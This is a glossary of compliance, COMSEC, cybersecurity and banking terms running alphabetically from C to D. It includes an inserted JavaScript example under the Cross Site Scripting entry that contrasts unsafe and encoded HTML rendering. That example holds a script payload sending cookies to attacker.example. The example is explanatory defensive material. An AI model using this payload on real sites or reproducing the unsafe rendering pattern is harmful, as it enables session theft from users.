Compliance Enforcement AuthoritynounThe North American Electric Reliability Corporation (NERC) or the Regional Entity in their respective roles of monitoring and enforcing compliance with the NERC Reliability Standards.OrganizationRegulatedCUIMay 12, 2026
compliance requirementnounThe various legal, contractual, and service level requirements that an organization must follow.RequirementRegulatedMay 12, 2026
compliance risknounThe risk to current and prospective earnings that arises from violating or not acting in accordance with laws, rules, regulations, prescribed practices, or ethical standards.MetricRegulatedMay 9, 2026
compliance violation is detectednounThis triggering event takes place when it is discovered that the condition of someone or something does not conform to documented policies and standards.FindingRegulatedMay 9, 2026
CompromisenounDisclosure of information to unauthorized persons, or a violation of the security policy of a system in which unauthorized intentional or unintentional disclosure, modification, destruction, or loss of an object may have occurred.EventRegulatedMay 12, 2026
Compromising EmanationsnounUnintentional signals that, if intercepted and analyzed, would disclose the information transmitted, received, handled, or otherwise processed by information systems equipment. See TEMPEST.VulnerabilityRegulatedCUIMay 9, 2026
Computer AbusenounIntentional or reckless misuse, alteration, disruption, or destruction of information processing resources.ThreatRegulatedMay 9, 2026
Computer forensicsnounThe practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data.ProcessRegulatedMay 12, 2026
Computer Network AttacknounActions taken through the use of computer networks to disrupt, deny, degrade, or destroy information resident in computers and computer networks, or the computers and networks themselves.ThreatRegulatedCUIMay 9, 2026
computer network defensenounActions taken to defend against unauthorized activity within computer networks. CND includes monitoring, detection, analysis (such as trend and pattern analysis), and response and restoration activities.CapabilityRegulatedMay 12, 2026
Computer Network ExploitationnounEnabling operations and intelligence collection capabilities conducted through the use of computer networks to gather data from target or adversary information systems or networks.ThreatRegulatedCUIMay 9, 2026
COMSECnounCommunications Security.CapabilityRegulatedCUIMay 9, 2026
COMSEC AccountnounAdministrative entity, identified by an account number, used to maintain accountability, custody, and control of COMSEC material.IdentityRegulatedCUIMay 9, 2026
COMSEC Account AuditnounExamination of the holdings, records, and procedures of a COMSEC account ensuring all accountable COMSEC material is properly handled and safeguarded.ProcessRegulatedCUIMay 9, 2026
COMSEC AidnounCOMSEC material that assists in securing telecommunications and is required in the production, operation, or maintenance of COMSEC systems and their components. COMSEC keying material, callsign/frequency systems, and supporting documentation, such as operating and maintenance manuals, are examples of COMSEC aids.DataRegulatedCUIMay 9, 2026
COMSEC AssemblynounGroup of parts, elements, subassemblies, or circuits that are removable items of COMSEC equipment.PhysicalRegulatedCUIMay 9, 2026
COMSEC BoundarynounDefinable perimeter encompassing all hardware, firmware, and software components performing critical COMSEC functions, such as key generation, handling, and storage.ControlRegulatedCUIMay 9, 2026
COMSEC Chip SetnounCollection of NSA-approved microchips.PhysicalRegulatedCUIMay 9, 2026
COMSEC Control ProgramnounComputer instructions or routines controlling or affecting the externally performed functions of key generation, key distribution, message encryption/decryption, or authentication.ControlRegulatedCUIMay 9, 2026
COMSEC DemilitarizationnounProcess of preparing COMSEC equipment for disposal by extracting all CCI, classified, or cryptographic (CRYPTO) marked components for their secure destruction, as well as defacing and disposing of the remaining equipment hulk.ProcessRegulatedCUIMay 9, 2026
COMSEC ElementnounRemovable item of COMSEC equipment, assembly, or subassembly; normally consisting of a single piece or group of replaceable parts.PhysicalRegulatedCUIMay 9, 2026
COMSEC End-itemnounEquipment or combination of components ready for use in a COMSEC application.PhysicalRegulatedCUIMay 9, 2026
COMSEC EquipmentnounEquipment designed to provide security to telecommunications by converting information to a form unintelligible to an unauthorized interceptor and, subsequently, by reconverting such information to its original form for authorized recipients; also, equipment designed specifically to aid in, or as an essential element of, the conversion process. COMSEC equipment includes crypto-equipment, crypto-ancillary equipment, cryptographic production equipment, and authentication equipment.PhysicalRegulatedCUIMay 9, 2026
COMSEC FacilitynounAuthorized and approved space used for generating, storing, repairing, or using COMSEC material.PhysicalRegulatedCUIMay 9, 2026
COMSEC IncidentnounOccurrence that potentially jeopardizes the security of COMSEC material or the secure electrical transmission of national security information or information governed by 10 U.S.C. Section 2315.EventRegulatedCUIMay 9, 2026
COMSEC InsecuritynounCOMSEC incident that has been investigated, evaluated, and determined to jeopardize the security of COMSEC material or the secure transmission of information.EventRegulatedCUIMay 9, 2026
COMSEC ManagernounIndividual who manages the COMSEC resources of an organization.RoleRegulatedCUIMay 9, 2026
COMSEC MaterialnounItem designed to secure or authenticate telecommunications. COMSEC material includes, but is not limited to key, equipment, devices, documents, firmware, or software that embodies or describes cryptographic logic and other items that perform COMSEC functions.DataRegulatedCUIMay 9, 2026
COMSEC Material Control SystemnounLogistics and accounting system through which COMSEC material marked "CRYPTO" is distributed, controlled, and safeguarded. Included are the COMSEC central offices of record, crypto logistic depots, and COMSEC accounts. COMSEC material other than key may be handled through the CMCS.SystemRegulatedCUIMay 9, 2026
COMSEC ModulenounRemovable component that performs COMSEC functions in a telecommunications equipment or system.PhysicalRegulatedCUIMay 9, 2026
COMSEC MonitoringnounAct of listening to, copying, or recording transmissions of one's own official telecommunications to analyze the degree of security.ProcessRegulatedCUIMay 9, 2026
COMSEC ProfilenounStatement of COMSEC measures and materials used to protect a given operation, system, or organization.ArtifactRegulatedCUIMay 9, 2026
COMSEC System DatanounInformation required by a COMSEC equipment or system to enable it to properly handle and control key.DataRegulatedCUIMay 9, 2026
COMSEC TrainingnounTeaching of skills relating to COMSEC accounting, use of COMSEC aids, or installation, use, maintenance, and repair of COMSEC equipment.ProcessRegulatedCUIMay 9, 2026
configuration change control processnounAn action taken to systematically manage all changes made to an asset's arrangement, system configuration, or security configuration, in order to prevent unnecessary disruptions and vulnerabilities and to mitigate threats. Its purpose is to ensure that all changes to a complex system are performed with the knowledge and consent of management.ProcessRegulatedMay 12, 2026
configuration change managementnounA process for managing configuration changes and variances in configurations.ProcessRegulatedMay 9, 2026
Configuration ControlnounProcess of controlling modifications to hardware, firmware, software, and documentation to protect the information system against improper modification prior to, during, and after system implementation.ProcessRegulatedMay 12, 2026
ConsentnounRegulatedMay 13, 2026
constitutenounGive legal or constitutional form to (an institution); establish by law.RequirementRegulatedMay 12, 2026
ConsumernounUsually refers to an individual engaged in non-commercial transactions.IdentityRegulatedPIIMay 9, 2026
Consumer AccountnounA deposit account held by a participating depository financial institution and established by a natural person primarily for personal, family, or household use and not for commercial purposes.DataRegulatedPIIMay 9, 2026
Consumer informationnounFor purposes of the Information Security Standards, “consumer information” means any record about an individual, whether in paper, electronic, or other form, that is a consumer report or is derived from a consumer report that is maintained by or on behalf of a financial institution for a business purpose, such as information that an institution obtains about a loan applicant or a prospective employee from a consumer report.DataRegulatedPIIMay 9, 2026
contact informationnounInformation usually containing the person's telephone number(s), fax number, address, and electronic mail address(es).DataRegulatedPIIMay 9, 2026
ContaminationnounType of incident involving the introduction of data of one security classification or security category into data of a lower security classification or different security category.EventRegulatedCUIMay 9, 2026
Contingency KeynounKey held for use under specific operational conditions or in support of specific contingency plans. See Reserve Keying Material.CredentialRegulatedCUIMay 9, 2026
Contingency PlanningnounThe purpose of this task is to support the required actions for planning for, responding to, and mitigating damaging events.ProcessRegulatedMay 12, 2026
Continuous MonitoringnounThe process implemented to maintain a current security status for one or more information systems or for the entire suite of information systems on which the operational mission of the enterprise depends. The process includes: 1) The development of a strategy to regularly evaluate selected IA controls/metrics, 2) Recording and evaluating IA relevant events and the effectiveness of the enterprise in dealing with those events, 3) Recording changes to IA controls, or changes that affect IA risks, and 4) Publishing the current security status to enable information-sharing decisions involving the enterprise.ProcessRegulatedCUIMay 12, 2026
Control requirementsnounProcess used to document and/or track internal processes to determine that those established procedures and/or physical security policies are being followed.RequirementRegulatedMay 9, 2026
Controlled Access AreanounPhysical area (e.g., building, room, etc.) to which only authorized personnel are granted unrestricted access. All other personnel are either escorted by authorized personnel or are under continuous surveillance.PhysicalRegulatedMay 9, 2026
Controlled Cryptographic ItemnounSecure telecommunications or information system, or associated cryptographic component, that is unclassified and handled through the COMSEC Material Control System (CMCS), an equivalent material control system, or a combination of the two that provides accountability and visibility. Such items are marked “Controlled Cryptographic Item,” or, where space is limited, “CCI”.PhysicalRegulatedCUIMay 9, 2026
Controlled Cryptographic Item AssemblynounDevice embodying a cryptographic logic or other COMSEC design that NSA has approved as a Controlled Cryptographic Item (CCI). It performs the entire COMSEC function, but depends upon the host equipment to operate.PhysicalRegulatedCUIMay 9, 2026
Controlled Cryptographic Item ComponentnounPart of a Controlled Cryptographic Item (CCI) that does not perform the entire COMSEC function but depends upon the host equipment, or assembly, to complete and operate the COMSEC function.PhysicalRegulatedCUIMay 9, 2026
Controlled Cryptographic Item EquipmentnounTelecommunications or information handling equipment that embodies a Controlled Cryptographic Item (CCI) component or CCI assembly and performs the entire COMSEC function without dependence on host equipment to operate.PhysicalRegulatedCUIMay 9, 2026
Controlled SpacenounThree-dimensional space surrounding information system equipment, within which unauthorized individuals are denied unrestricted access and are either escorted by authorized individuals or are under continuous physical or electronic surveillance.PhysicalRegulatedMay 12, 2026
Controlled Unclassified InformationnounA categorical designation that refers to unclassified information that does not meet the standards for National Security Classification under Executive Order 12958, as amended, but is (i) pertinent to the national interests of the United States or to the important interests of entities outside the federal government, and (ii) under law or policy requires protection from unauthorized disclosure, special handling safeguards, or prescribed limits on exchange or dissemination. Henceforth, the designation CUI replaces "Sensitive But Unclassified" (SBU).RequirementRegulatedCUIMay 9, 2026
ControllernounRegulatedPIIMay 13, 2026
Controlling AuthoritynounOfficial responsible for directing the operation of a cryptonet and for managing the operational use and control of keying material assigned to the cryptonet.RoleRegulatedCUIMay 9, 2026
Conversion plannounA plan that details transition planning and implementation issues in the period between the execution of an outsourcing agreement and the full production use of the outsourced services.ProcessRegulatedMay 12, 2026
Cooperative Remote RekeyingnounSynonymous with manual remote rekeying.ProcessRegulatedCUIMay 12, 2026
Core firmnounCore clearing and settlement organization that serves critical financial markets.OrganizationRegulatedMay 9, 2026
Correspondent BanknounAn institution, acting on behalf of other institutions (respondents), that settles the checks it collects for them by using accounts on its books or by sending wire funds transfers. Generally, a provider of banking and payment services to other financial institutions.OrganizationRegulatedMay 9, 2026
Courtesy amount recognition (CAR)nounAutomated recognition of the courtesy amount, the numeric amount written on a check (as opposed to the legal amount written in words).DataRegulatedPCIMay 12, 2026
Covered EntitynounAny Person operating under or required to operate under a license, registration, charter, certificate, permit, accreditation or similar authorization under the Banking Law, the Insurance Law or the Financial Services Law.OrganizationRegulatedMay 12, 2026
Covert Storage ChannelnounCovert channel involving the direct or indirect writing to a storage location by one process and the direct or indirect reading of the storage location by another process. Covert storage channels typically involve a finite resource (e.g., sectors on a disk) that is shared by two subjects at different security levels.VulnerabilityRegulatedCUIMay 9, 2026
Covert Timing ChannelnounCovert channel in which one process signals information to another process by modulating its own use of system resources (e.g., central processing unit time) in such a way that this manipulation affects the real response time observed by the second process.VulnerabilityRegulatedMay 12, 2026
Credential Service ProvidernounA trusted entity that issues or registers Subscriber tokens and issues electronic credentials to Subscribers. The CSP may encompass Registration Authorities (RAs) and Verifiers that it operates. A CSP may be an independent third party, or may issue credentials for its own use.OrganizationRegulatedMay 12, 2026
Credit CardnounA card indicating the holder has been granted a line of credit. It enables the holder to make purchases or withdraw cash up to a prearranged ceiling. The credit granted can be settled in full by the end of a specified period or can be settled in part, with the balance taken as extended credit. Interest is charged based on the terms of the credit card agreement and the holder is sometimes charged an annual fee.DataRegulatedPCIMay 9, 2026
Credit EntrynounAn entry to the record of an account that represents the transfer or placement of funds into the account.ArtifactRegulatedPCIMay 9, 2026
credit policynoun1. A company's policy on when its customers should pay for goods or services they have ordered. 2. A government's policy at a particular time on how easy or difficult it should be for people and businesses to borrow and how much it should cost; the government influences this through changes in interest rates.RequirementRegulatedMay 12, 2026
criminal records checknounThe purpose of this task is to determine if a person has been convicted of a crime.ProcessRegulatedPIIMay 9, 2026
critical business processnounA business process that must be restored immediately after a disruption to ensure the affected firm's ability to protect its assets, meet its critical needs, and satisfy mandatory regulations and requirements.ProcessRegulatedMay 9, 2026
Critical Financial MarketsnounFinancial markets whose operations are critical to the economy. Critical financial markets provide the means for financial institutions to adjust their cash and securities positions and those of their customers in order to manage liquidity, market, and other risks to their organizations. Critical financial markets also provide support for the provision of a wide range of financial services to businesses and consumers in the United States and support the implementation of monetary policy. Examples of "critical financial markets" include: • Federal funds, foreign exchange, and commercial paper; • U.S. Government and agency securities; and • Corporate debt and equity securities.SystemRegulatedMay 12, 2026
Critical infrastructurenounSystem and assets, whether physical or virtual, so vital to the U.S. that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters. [Critical Infrastructures Protection Act of 2001, 42 U.S.C. 5195c(e)]SystemRegulatedCUIMay 9, 2026
Critical Market ParticipantsnounParticipants in the financial markets that perform critical operations or provide critical services. Their inability to perform these operations or services could result in major disruptions in the financial system.OrganizationRegulatedMay 9, 2026
critical operationsnounAny activity, function, process, or service, the loss of which, for even a short period of time, would materially affect the continued operation of an FMI, its participants, the market it serves, and/or the broader financial system.ProcessRegulatedMay 9, 2026
Critical PathnounThe critical path represents the business processes or systems that must receive the highest priority during the recovery phase.ProcessRegulatedMay 12, 2026
critical systemnounA system that is necessary and crucial to the organization.SystemRegulatedMay 9, 2026
Critical system (infrastructure)nounThe systems and assets, whether physical or virtual, that are so vital that the incapacity or destruction of such may have a debilitating impact.SystemRegulatedMay 12, 2026
Cross Site ScriptingnounA vulnerability that allows attackers to inject malicious code into an otherwise benign website. These scripts acquire the permissions of scripts generated by the target website and can therefore compromise the confidentiality and integrity of data transfers between the website and client. Websites are vulnerable if they display user supplied data from requests or forms without sanitizing the data so that it is not executable.VulnerabilityRegulatedMay 12, 2026
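The entry above says a site is vulnerable when it displays user-supplied data without making it non-executable. The following is an added example, not from the original page, showing the vulnerable pattern beside the hardened one: the same server-side template renders a query-string value first verbatim and then after HTML entity encoding. The function names and the attacker payload are constructed for the demo; the encoder shown is correct only for the HTML text context (values placed inside attributes, URLs or script blocks need context-specific encoders).

```javascript
// Added example: reflected XSS, vulnerable rendering vs output encoding (hypothetical names).

// Entity-encode a value for placement between HTML tags (text context only).
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: `name` comes straight from the request (e.g. ?name=...) and is
// interpolated verbatim, so any markup in it is parsed and run by the browser
// with the permissions of the site's own scripts.
function renderGreetingUnsafe(name) {
  return `<h1>Hello, ${name}</h1>`;
}

// Hardened: identical template, but the untrusted value is encoded for the
// HTML text context before insertion, so it is displayed rather than executed.
function renderGreetingSafe(name) {
  return `<h1>Hello, ${escapeHtml(name)}</h1>`;
}

// Crude check for the demo: does the rendered page contain a <script> element
// or an inline event handler? Neither exists in the template itself.
function containsExecutableMarkup(html) {
  return /<script\b/i.test(html) || /\bon\w+\s*=/i.test(html);
}

// Constructed attacker input as it would arrive in the query string.
const PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

function xssDemo() {
  const unsafe = renderGreetingUnsafe(PAYLOAD);
  const safe = renderGreetingSafe(PAYLOAD);
  return {
    unsafeExecutable: containsExecutableMarkup(unsafe), // the script tag survives
    safeExecutable: containsExecutableMarkup(safe),     // it becomes &lt;script&gt;
    safeHtml: safe,
  };
}
```

Encoding at the output point, in the context where the value lands, is the fix the entry alludes to with "sanitizing"; filtering input on the way in is not a substitute, because the same value may be rendered in several contexts.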
Cross-Domain CapabilitiesnounThe set of functions that enable the transfer of information between security domains in accordance with the policies of the security domains involved.CapabilityRegulatedMay 12, 2026
Cross-Domain SolutionnounA form of controlled interface that provides the ability to manually and/or automatically access and/or transfer information between different security domains.ControlRegulatedCUIMay 9, 2026
Crypto OfficernounAn operator or process (subject), acting on behalf of the operator, performing cryptographic initialization or management functions.RoleRegulatedMay 12, 2026
Cryptographic AlarmnounCircuit or device that detects failures or aberrations in the logic or operation of crypto-equipment. A crypto-alarm may inhibit transmission or may provide a visible and/or audible alarm.EventRegulatedCUIMay 9, 2026
Cryptographic Ancillary EquipmentnounEquipment designed specifically to facilitate efficient or reliable operation of cryptographic equipment, without performing cryptographic functions itself.PhysicalRegulatedCUIMay 9, 2026
Cryptographic BoundarynounAn explicitly defined continuous perimeter that establishes the physical bounds of a cryptographic module and contains all the hardware, software, and/or firmware components of a cryptographic module.ControlRegulatedMay 9, 2026
Cryptographic ComponentnounHardware or firmware embodiment of the cryptographic logic. A cryptographic component may be a modular assembly, a printed wiring assembly, a microcircuit, or a combination of these items.PhysicalRegulatedCUIMay 12, 2026
Cryptographic EquipmentnounEquipment that embodies a cryptographic logic.PhysicalRegulatedCUIMay 9, 2026
Cryptographic Ignition KeynounDevice or electronic key used to unlock the secure mode of crypto-equipment.CredentialRegulatedCUIMay 9, 2026
Cryptographic LogicnounThe embodiment of one (or more) cryptographic algorithm(s) along with alarms, checks, and other processes essential to effective and secure performance of the cryptographic process(es).CapabilityRegulatedMay 12, 2026
Cryptographic MaterialnounCOMSEC material used to secure or authenticate information.CredentialRegulatedCUIMay 9, 2026
Cryptographic ModulenounThe set of hardware, software, firmware, or some combination thereof that implements cryptographic logic or processes, including cryptographic algorithms, and is contained within the cryptographic boundary of the module.SystemRegulatedMay 12, 2026
Cryptographic Module Validation ProgramnounValidates cryptographic modules to Federal Information Processing Standard (FIPS) 140-2 and other cryptography-based standards. The CMVP is a joint effort between National Institute of Standards and Technology (NIST) and the Communications Security Establishment (CSE) of the government of Canada. Products validated as conforming to FIPS 140-2 are accepted by the federal agencies of both countries for the protection of sensitive information (United States) or Designated Information (Canada). The goal of the CMVP is to promote the use of validated cryptographic modules and provide federal agencies with a security metric to use in procuring equipment containing validated cryptographic modules.CapabilityRegulatedCUIMay 9, 2026
Cryptographic NetnounStations holding a common key.NetworkRegulatedCUIMay 9, 2026
Cryptographic SecuritynounComponent of COMSEC resulting from the provision of technically sound cryptographic systems and their proper use.CapabilityRegulatedCUIMay 12, 2026
Cryptographic SynchronizationnounProcess by which a receiving decrypting cryptographic logic attains the same internal state as the transmitting encrypting logic.ProcessRegulatedMay 12, 2026
Cryptographic SystemnounAssociated information assurance items interacting to provide a single means of encryption or decryption.SystemRegulatedMay 12, 2026
Cryptographic System AnalysisnounProcess of establishing the exploitability of a cryptographic system, normally by reviewing transmitted traffic protected or secured by the system under study.ProcessRegulatedCUIMay 9, 2026
Cryptographic System EvaluationnounProcess of determining vulnerabilities of a cryptographic system and recommending countermeasures.ProcessRegulatedMay 9, 2026
Cryptographic System ReviewnounExamination of a cryptographic system by the controlling authority ensuring its adequacy of design and content, continued need, and proper distribution.ProcessRegulatedCUIMay 9, 2026
Currency BalancenounAs at the time calculated, the current amount (positive or negative) of a particular eligible currency included in an account, as indicated on the books and records of CLS Bank. A currency balance is not a separate account.DataRegulatedMay 9, 2026
custom softwarenounSoftware developed for a specific use, user, or organization.SystemRegulatedMay 12, 2026
customer accessnounA customer’s ability and means to communicate or interact with a system, use system resources or to control system components and functions.CapabilityRegulatedMay 12, 2026
customer accountnounA client's formal contract with an individual or organization whereby the client receives goods or services.IdentityRegulatedPIIMay 9, 2026
customer data privacynounThe ability an organization or individual has to determine what customer data in a computer system can be shared with third parties.RequirementRegulatedPIIMay 9, 2026
customer informationnounA term used in the Information Security Standards to mean any record containing non-public personal information about a customer, whether in paper, electronic, or other form, that is maintained by or on behalf of a financial institution.DataRegulatedPIIMay 9, 2026
customer information systemnounFor purposes of the Information Security Standards, “customer information systems” means any methods used to access, collect, store, use, transmit, protect, or dispose of customer information.SystemRegulatedPIIMay 9, 2026
cyber assetnounProgrammable electronic devices and communication networks including hardware, software and data.SystemRegulatedCUIMay 9, 2026
Cyber AttacknounAn attack, via cyberspace, targeting an enterprise’s use of cyberspace for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information.ThreatRegulatedMay 12, 2026
cyber incidentnounActions taken through the use of computer networks that result in an actual or potentially adverse effect on an information system and/or the information residing therein. See Incident.EventRegulatedMay 9, 2026
cyber incident response plannounThe documented series of actions and processes for responding to a security event in 'cyberspace' (i.e. the Internet, corporate networks, etc.).ProcessRegulatedMay 12, 2026
cyber incident response roles and responsibilitiesnounThe functions and duties of personnel responsible for triaging and resolving cybersecurity events that disrupt operations, and for alerting interested personnel and affected parties in conformance with pertinent standards.ProcessRegulatedMay 9, 2026
cyber infrastructurenounIncludes electronic information and communications systems and services and the information contained in these systems and services. Information and communications systems and services are composed of all hardware and software that process, store, and communicate information, or any combination of all of these elements. Processing includes the creation, access, modification, and destruction of information. Storage includes paper, magnetic, electronic, and all other media types. Communications include sharing and distribution of information. For example: computer systems; control systems (e.g., supervisory control and data acquisition–SCADA); networks, such as the Internet; and cyber services (e.g., managed security services) are part of cyber infrastructure.SystemRegulatedMay 12, 2026
cyber resilience frameworknounConsists of the policies, procedures and controls an FMI has established to identify, protect, detect, respond to and recover from the plausible sources of cyber risks it faces.FrameworkRegulatedMay 9, 2026
cyber risk managementnounThe process used by an FMI to establish an enterprise-wide framework to manage the likelihood of a cyber attack and develop strategies to mitigate, respond to, learn from and coordinate its response to the impact of a cyber attack. The management of an FMI’s cyber risk should support the business processes and be integrated in the FMI’s overall risk management framework.ProcessRegulatedMay 9, 2026
cyber supply chain risk assessment processnounThe foundational task in cyber supply chain risk management: assessments aimed at identifying and evaluating the risk applicable to information and operational technology (IT/OT) outsourcing, diverse distribution routes, assorted technologies, laws, policies, procedures, and practices.ProcessRegulatedMay 12, 2026
cyber supply chain risk management processnounA detailed description of the steps necessary to mitigate the risks associated with the distributed and interconnected nature of IT/OT product and service supply chains. It covers the entire life cycle of a system (including design, development, distribution, deployment, acquisition, maintenance, and destruction), as supply chain threats and vulnerabilities may intentionally or unintentionally compromise an IT/OT product or service at any stage.ProcessRegulatedMay 9, 2026
cyber system recovery plannounA step-by-step outline of the processes and procedures to be performed to bring a cyber system back to working order after an incident has occurred.ProcessRegulatedCUIMay 12, 2026
cyber threatnounAn internal or external circumstance, event, action, occurrence, or person with the potential to exploit technology-based vulnerabilities and to adversely impact (create adverse consequences for) organizational operations, organizational assets (including information and information systems), individuals, other organizations, or society.ThreatRegulatedMay 12, 2026
cybersecurity controlnounPractices and procedures established to protect organizational assets, user assets, and the cyber environment from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide integrity, confidentiality, and availability.ControlRegulatedMay 9, 2026
cybersecurity eventnounAny act or attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or information stored on such Information System.EventRegulatedMay 9, 2026
cybersecurity incident responsenounThe process of managing and resolving cybersecurity events that disrupt the organization's operations and restoring services.ProcessRegulatedMay 12, 2026
cybersecurity law, rule, or regulationnounAny federal, state, or local statute or ordinance or any rule or regulation adopted according to any federal, state, or local statute or ordinance that deals specifically with the topic of protecting or defending computerized environments, organizational computerized assets, and user’s computerized assets.RequirementRegulatedMay 9, 2026
Cybersecurity outcomenounThe business-need-driven, tiered implementation of an outcome listed in the Categories or Subcategories of Table 2 in the NIST Cybersecurity Framework.RequirementRegulatedMay 12, 2026
cybersecurity patchnounComputer code intended to fix a cybersecurity vulnerability.ControlRegulatedMay 9, 2026
cybersecurity plannounFormal document that provides an overview of the cybersecurity requirements for an information technology or industrial control system and describes the cybersecurity controls in place or planned for meeting those requirements.RequirementRegulatedCUIMay 9, 2026
cybersecurity policynounA set of criteria for the provision of security services.RequirementRegulatedMay 12, 2026
cybersecurity programnounAn integrated group of activities designed and managed to meet cybersecurity objectives for the organization and/or the function. A cybersecurity program may be implemented at either the organization or the function level, but a higher-level implementation and enterprise viewpoint may benefit the organization by integrating activities and leveraging resource investments across the entire enterprise.ProcessRegulatedMay 12, 2026
cybersecurity requirementnounRequirements levied on information technology and operational technology (IT/OT) that are derived from organizational mission and business case needs (in the context of applicable legislation, Executive Orders, directives, policies, standards, instructions, regulations, procedures) to ensure the confidentiality, integrity, and availability of the services being provided by the organization and the information being processed, stored, or transmitted.RequirementRegulatedMay 12, 2026
cybersecurity risknounA risk to organizational operations (including mission, functions, image, and reputation), resources, and other organizations due to the potential for unauthorized access, use, disclosure, disruption, modification, or destruction of information, information technology, and/or operational technology.ThreatRegulatedMay 12, 2026
CyberwarfarenounActivities supported by military organizations with the purpose of threatening the survival and well-being of a society or foreign entity.ThreatRegulatedCUIMay 9, 2026
Dark PatternnounRegulatedMay 13, 2026
data aggregationnounCompilation of individual data systems and data that could result in the totality of the information being classified, or classified at a higher level, or of beneficial use to an adversary.ProcessRegulatedCUIMay 9, 2026
data backupnounThe physical copying of data files to a removable storage device that allows the data to be stored in another location.DataRegulatedMay 9, 2026
data breachnounThe unauthorized movement or disclosure of sensitive information to a party, usually outside the organization, that is not authorized to have or see the information.EventRegulatedMay 12, 2026
Data centernounA facility that houses an institution's most important information systems components, including computer systems, telecommunications components, and storage systems.PhysicalRegulatedMay 9, 2026
Data Encryption AlgorithmnounThe DEA cryptographic engine that is used by the Triple Data Encryption Algorithm (TDEA).ControlRegulatedMay 12, 2026
Data Encryption StandardnounCryptographic algorithm designed for the protection of unclassified data and published by the National Institute of Standards and Technology (NIST) in Federal Information Processing Standard (FIPS) Publication 46. (FIPS 46-3 withdrawn 19 May 2005) See Triple DES.ControlRegulatedMay 12, 2026
Data leakagenounAn unauthorized data transfer out of a computer or data center.EventRegulatedMay 12, 2026
data lossnounThe exposure of proprietary, sensitive, or classified information through either data theft or data leakage.EventRegulatedIPMay 12, 2026
Data loss prevention (DLP) programnounA comprehensive approach (covering people, processes, and systems) of implementing policies and controls designed specifically to discover, monitor, and protect confidential data wherever it is stored, used, or in transit over the network and at the perimeter.ProcessRegulatedMay 12, 2026
Data retentionnounRefers to the policies that govern data and records management for meeting internal, legal and regulatory data archival requirements.RequirementRegulatedMay 9, 2026
data storage medianounThe physical form of how data is stored (e.g. magnetic tape, CD-ROM, paper).PhysicalRegulatedMay 12, 2026
data theftnounThe deliberate or intentional act of stealing information.ThreatRegulatedMay 12, 2026
Data Transfer DevicenounFill device designed to securely store, transport, and transfer electronically both COMSEC and TRANSEC key, designed to be backward compatible with the previous generation of COMSEC common fill devices, and programmable to support modern mission systems.PhysicalRegulatedCUIMay 9, 2026
Data-At-RestnounRefers to all data stored on hard drives, thumb drives, DVDs, CDs, floppy diskettes, and similar storage media. It excludes data that is traversing a network or temporarily residing in computer memory to be read or updated.DataRegulatedMay 9, 2026
Daylight overdraftnounA daylight overdraft occurs at any point in the business day when the balance in an institution's account becomes negative. Daylight overdrafts can occur in accounts at Federal Reserve Banks as well as at private financial institutions. Daylight credit can also arise in the form of net debit positions of participants in private payment systems. A daylight overdraft occurs at a Federal Reserve Bank when there are insufficient funds in an institution's Federal Reserve Bank account to cover outgoing funds transfers or incoming book-entry securities transfers. An overdraft can also be the result of other payment activity processed by the Federal Reserve Bank, such as check or automated clearinghouse transactions.EventRegulatedMay 12, 2026
Debit cardnounA payment card issued as either a PIN-based debit (ATM) card or as a signature-based debit card from one of the bankcard associations. A payment card issued to a person for purchasing goods and services through an electronic transfer of funds from a demand deposit account rather than using cash, checks, or drafts at the point-of-sale.PhysicalRegulatedPCIMay 9, 2026
Debit entrynounAn entry to the record of an account to represent the transfer or removal of funds from the account.DataRegulatedMay 12, 2026
DecertificationnounRevocation of the certification of an information system item or equipment for cause.EventRegulatedMay 9, 2026
Dedicated ModenounInformation systems security mode of operation wherein each user, with direct or indirect access to the system, its peripherals, remote terminals, or remote hosts, has all of the following: 1. valid security clearance for all information within the system, 2. formal access approval and signed nondisclosure agreements for all the information stored and/or processed (including all compartments, subcompartments, and/or special access programs), and 3. valid need-to-know for all information contained within the information system. When in the dedicated security mode, a system is specifically and exclusively dedicated to and controlled for the processing of one particular type or classification of information, either for full-time operation or for a specified period of time.RequirementRegulatedCUIMay 9, 2026
Default ClassificationnounClassification reflecting the highest classification being processed in an information system. Default classification is included in the caution statement affixed to an object.RequirementRegulatedCUIMay 9, 2026
Deferred net settlementnounSee "National Settlement Service".ProcessRegulatedMay 12, 2026
DegaussnounProcedure that reduces the magnetic flux to virtual zero by applying a reverse magnetizing field. Also called demagnetizing.ProcessRegulatedCUIMay 12, 2026
Delegated Development ProgramnounINFOSEC program in which the Director, NSA, delegates, on a case-by-case basis, the development and/or production of an entire telecommunications product, including the INFOSEC portion, to a lead department or agency.ProcessRegulatedCUIMay 9, 2026
DepositorynounAn institution that holds funds or marketable securities for safekeeping. Depositories may be privately or publicly operated and allow securities transfers through book-entry and offer funds accounts permitting funds transfers as a means of payment.PhysicalRegulatedPCIMay 9, 2026
Depository banknounThe institution at which a check is first deposited. While this term is often used interchangeably with "depository," "depositary" is a term of art in laws and regulations related to check processing.OrganizationRegulatedMay 9, 2026
Depository bank (Check 21)nounAlso known as Bank of First Deposit (BOFD). The first bank to which a check is transferred even though it is also the paying bank or the payee. A check deposited in an account is deemed to be transferred to the financial institution holding the account into which the check is deposited, even though the check is physically received and endorsed first by another financial institution.OrganizationRegulatedPCIMay 12, 2026
Descriptive Top-Level SpecificationnounA natural language description of a system’s security requirements, an informal design notation, or a combination of the two.RequirementRegulatedCUIMay 12, 2026
destructionnounThe purpose of this task is to remove an asset from existence and to ensure media cannot be reused as originally intended and information is virtually impossible to recover or prohibitively expensive to recover.ProcessRegulatedMay 9, 2026
destruction of datanounThe complete physical destruction of data or of the data carrier containing them.ProcessRegulatedMay 9, 2026
Deterministic Random Bit GeneratornounA Random Bit Generator (RBG) that includes a DRBG mechanism and (at least initially) has access to a source of entropy input. The DRBG produces a sequence of bits from a secret initial value called a seed, along with other possible inputs. A DRBG is often called a Pseudorandom Number (or Bit) Generator.CapabilityRegulatedMay 12, 2026
